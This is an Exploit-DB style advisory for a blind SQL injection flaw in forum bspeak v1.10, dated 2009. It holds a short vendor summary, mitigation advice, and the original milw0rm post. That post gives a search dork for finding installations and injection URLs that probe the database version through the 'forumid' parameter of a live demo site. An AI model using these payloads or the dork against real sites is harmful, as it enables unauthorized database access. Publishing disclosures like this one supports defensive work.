forum bspeak v1.10 Blind SQL Injection Exploit

vendor:

forum bspeak

by:

Snakespc

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: forum bspeak

Affected Version From: 1.10

Affected Version To: 1.10

Patch Exists: NO

Related CWE: N/A

CPE: a:26th_avenue:forum_bspeak:1.10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

forum bspeak v1.10 Blind SQL Injection Exploit

forum bspeak v1.10 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the HTTP request. For example, an attacker can send a malicious SQL query to the vulnerable parameter ‘forumid’ in the HTTP request as follows: http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4. If the application is vulnerable, the attacker can gain access to the database and can execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#-------------------------AllaH AkbaR-------------------------------
#forum bspeak v1.10  Blind SQL Injection Exploit
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
#            Aflawa Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#
#Script:forum (bspeak v1.10) www.26thavenue.com/index.php
#
#Demo:http://www.26thavenue.com//bspeakdemo/
#
#Dork:"Powered by bSpeak 1.10"
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3'
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :)
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no  :)
#
#-------------------------SNAKES TEAM-------------------------------
#Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-20]